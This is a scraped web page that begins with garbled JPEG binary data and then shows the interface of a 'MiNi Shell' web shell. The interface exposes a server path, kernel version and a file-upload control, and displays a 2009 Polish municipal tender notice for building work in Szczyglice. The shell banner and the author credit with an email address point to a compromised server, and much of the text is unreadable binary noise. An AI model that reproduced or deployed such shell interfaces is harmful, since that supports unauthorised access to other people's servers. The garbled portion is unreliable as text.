JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/72425-N-2009.html

<p class="kh_header"><b>Głogów: Budowa świetlicy wiejskiej z zapleczem OSP w Szczyglicach</b><br>
<b>Numer ogłoszenia: 72425 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głogów , ul. Słodowa 2b, 67-200 Głogów, woj. dolnośląskie, tel. 076 836 55 55, faks 076 836 55 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ugglogow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej z zapleczem OSP w Szczyglicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dalsza kontynuacja robót budowlanych na zadaniu, pn : 
Budowa świetlicy wiejskiej z zapleczem OSP w Szczyglicach  w zakresie niezbędnym 
do funkcjonowania tylko pomieszczeń garażu i zaplecza OSP:

1.1.  roboty budowlane wykończeniowe:
a. zewnętrzna stolarka okienna z PCV obiektu,
b. zewnętrzna stolarka drzwiowa z PVC obiektu w tym drzwi garażowe panelowe ocieplane, 
    uchylne , podnoszone mechanicznie z automatem do otwierania (pilotem i ręcznie),    
c. tynki i okładziny z płytek ceramicznych na wysokość do 2,0m, 
d. malowanie 
e. podłoża z ociepleniem,  posadzki z płytek gresowych antypoślizgowych,

1.2.  instalacje wewnętrzne: 
a. wodociągowa od zestawu  wodomierzowego do pomieszczeń sanitarnych zaplecza OSP 
     wraz z zaworami i bateriami 
b. kanalizacyjna pomieszczeniu garażu i zaplecza OSP w tym: od K1 do K2 (tylko z trójnikami  
      bez podejść odpływowych)  do K4 w komplecie wraz z urządzeniami,
c. wentylacyjna  poprzez wentylatory wywiewne nakratkowe  typu EDM 100, sprzężone           
       z obwodem oświetlenia, zamontowane na kanałach wentylacji grawitacyjnej,
d. elektryczna,   zewnętrzny  WLZ  od  SL-1/6PNK do TG poprzez W.poż.
e. elektryczna , wewnętrzna WLZ od TG  do T-OSP (obudowa wnękowa),  grzejniki
      elektryczne 
f. instalacja odgromowa   
c.) przyłącze kanalizacyjne od obiektu a bezodpływowego z odpowietrzeniem 
     wyprowadzonym ponad dach garażu.
 
1.3.  wjazd do garażu OSP 
a.  konstrukcja podbudowy,
b.  nawierzchni z kostki brukowej betonowej grubości 8cm w obudowie z krawężnika  
      drogowego.

Dopuszcza się składanie ofert równoważnych w zakresie  materiałów   o  tych samych parametrach i tej samej lub wyższej jakości jak przyjęte w dokumentacji. W przypadku składania oferty równoważnej, wszelkie formalności i  koszty związane z wprowadzeniem zmian do projektu obciążą wykonawcę na etapie realizacji i nie mogą wpłynąć na zmianę terminu realizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.26.12.00-6, 45.44.30.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wysokość wadium zamawiający ustalił w kwocie  5.000,zł
2.Termin wnoszenia wadium  do dnia  składania ofert do godz. 10.00
3.Wadium można wnieść w następujących formach:
-pieniądzu,
-poręczeniach  bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych, 
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

 4.W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto zamawiającego tj. Urząd Gminy Głogów nr konta 44 8646 0008 0000 0000 6161 0004 BS w Głogowie  dołączając do oferty ksero dowodu wpłaty
   W przypadku wniesienia wadium w innej formie niż forma pieniężna:
-	oryginał dokumentu dostarczyć do zamawiającego tj Urząd Gminy Głogów 
ul. Słodowa 2B pokój nr 8 do dnia składania ofert  do godz.10.00 kserokopię dokumentu potwierdzoną za zgodność dołączyć do oferty.
   Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust.5 Ustawy Prawo zamówień publicznych.
5.Zwrot wadium na zasadach określonych w przepisach Ustawy prawo zamówień publicznych .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy :
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, tj. zakres ich działalności obejmuje wykonanie robót budowlanych,
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
 Osoby zdolne do wykonania zamówienia muszą posiadać uprawnienia budowlane  specjalności  konstrukcyjno-budowlanej, instalacyjnej  (w zakresie instalacji i urządzeń
cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych), elektrycznej w zakresie instalacji i urządzeń elektrycznych, wraz z  przynależnością do Izby Inżynierów Budownictwa.  
Należy wskazać osobę która będzie pełnić funkcję Kierownika budowy.
3.znajdują się  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj,
a. posiadają środki finansowe na rachunku lub zdolność kredytową w wysokości nie mniej niż 50.000.000 zł
b.są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na   podstawie art.24 ust.1 i 2 ustawy z dnia 29.01.2004 roku .-Prawo zamówień publicznych(Tekst jednolity Dz.U z 2007r Nr 223 poz.1655 ze zm.).
5.udzielą 3-letniej gwarancji jakości i rękojmi na roboty oraz dostarczone wyposażenie i zamontowane urządzenia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu  wykonawca  ma  dostarczyć następujące oświadczenia i dokumenty:
1.Formularz oferty  - zał. nr 1 do SIWZ  cena w ofercie powinna być podana cyfrowo 
i   słownie. 
W przypadku składania oferty równoważnej na formularzu należy dopisać wyraz -Równoważna-.
     Jeżeli o udzielenie zamówienia wykonawcy ubiegają się wspólnie - ofertę podpisuje pełnomocnik. W miejscu -nazwa i adres wykonawcy-  należy wpisać dane dotyczące konsorcjum ( wymienić wszystkich Wykonawców wspólnie ubiegających się o zamówienie)
2. Zestawienie elementów robót z kosztorysu ofertowego - (zał. Nr 2 do SIWZ)
  Jeżeli o udzielenie zamówienia wykonawcy ubiegają się wspólnie - ofertę podpisuje pełnomocnik.
3.Kosztorys ofertowy opracowany metodą uproszczoną wraz z czynnikami produkcji                    
    i  zestawieniem materiałów.
   Jeżeli o udzielenie zamówienia wykonawcy ubiegają się wspólnie - dokumenty podpisuje     pełnomocnik.
4.Dowód wpłaty wadium
5.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.Oświadczenie o spełnieniu warunków udziału w postępowaniu -art22 ust. 1  pkt1- 4 (zał. nr 3 do SIWZ)
7.Oświadczenie o nie podleganiu  wykluczeniu  z postępowania o zamówienie publiczne z przyczyn przewidzianych w art. 24 ust.1 pkt1-10, ust.2 pkt 1-4 ustawy prawo  zamówień publicznych ( zał. nr 4  do SIWZ),
8.Oświadczenie o spełnieniu warunków  udziału w postępowaniu zgodnie z art.44 ustawy prawo zamowień publicznych (zał. Nr 4a do SIWZ),
9.Oświadczenie, że wykonawca  zapoznał się z projektem, placem budowy, warunkami   specyfikacji istotnych warunków zamówienia oraz umowy i nie wnosi zastrzeżeń  (zał. nr 5 do SIWZ)     
10.Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzających odpowiednio, że wykonawca nie zalega  z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń  że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześnie niż 3 miesiące przed upływem terminu składania ofert.
11.Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada podstawowy rachunek, potwierdzającej  wysokość posiadanych środków finansowych lub zdolność kredytową  wykonawcy  na kwotę minimum 50.000 zł , wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
  W przypadku składania oferty przez kilku wykonawców w/w informacja może być od jednego  wykonawcy  lub kilku wykonawców, ważne jest aby łączna zdolność kredytowa  bądź łączna wielkość środków finansowych spełniała warunek w/w kwoty. 

12.Polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności.
13.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (zał. Nr 6 do SIWZ), bądź pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby którymi będzie dysponował.
     Do oferty należy dołączyć dokumenty stwierdzające, że kierownik budowy wraz z kierownikami robót branżowych  którzy będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia wraz z przynależnością do Okręgowej Izby Inżynierów Budownictwa   
14.Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom  budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca  wykonania oraz załączeniem  dokumentów potwierdzających  że roboty  te zostały  wykonane należycie (zał. nr 7 do SIWZ)
15.Wykaz  podmiotów, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a  także zakresu wykonywanych przez nich czynności. W przypadku ich  nie występowania - oświadczenie wykonawcy, że podmioty (podwykonawcy) nie będą uczestniczyć  w wykonaniu zamówienia.( zał. nr 8 do SIWZ)
16.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
17.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
18.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art.23 ustawy Prawo zamówień publicznych
Wykonawcy wspólnie ubiegający się o zmówienie zobowiązani są złożyć do wniosku:
1.Pełnomocnictwo udzielone jednemu z partnerów przez pozostałych wykonawców do   reprezentowania ich w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
        2.Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, zamawiający zażąda przed zawarciem umowy, umowę regulującą współpracę tych wykonawców.
Przy składaniu oświadczeń i dokumentów z pkt.6,7,8,9,11-oświadczenia i dokumenty   winien złożyć każdy z wykonawców.
Przy składaniu dokumentów z pkt.10,12,13,14,15,16,17,18- można złożyć jeden wspólny dokument, który podpisuje pełnomocnik

Dokumenty wymagane mogą być przedstawione w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez upoważnion(ego)nych  przedstawiciel(a)i  wykonawcy (w przypadku wspólnego ubiegania się o zamówienie przez pełnomocnika ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugglogow.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na stronie internetowej zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Urząd Gminy Głogów   pok. 8,  67-200 Głogów  ul. Słodowa 2B.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com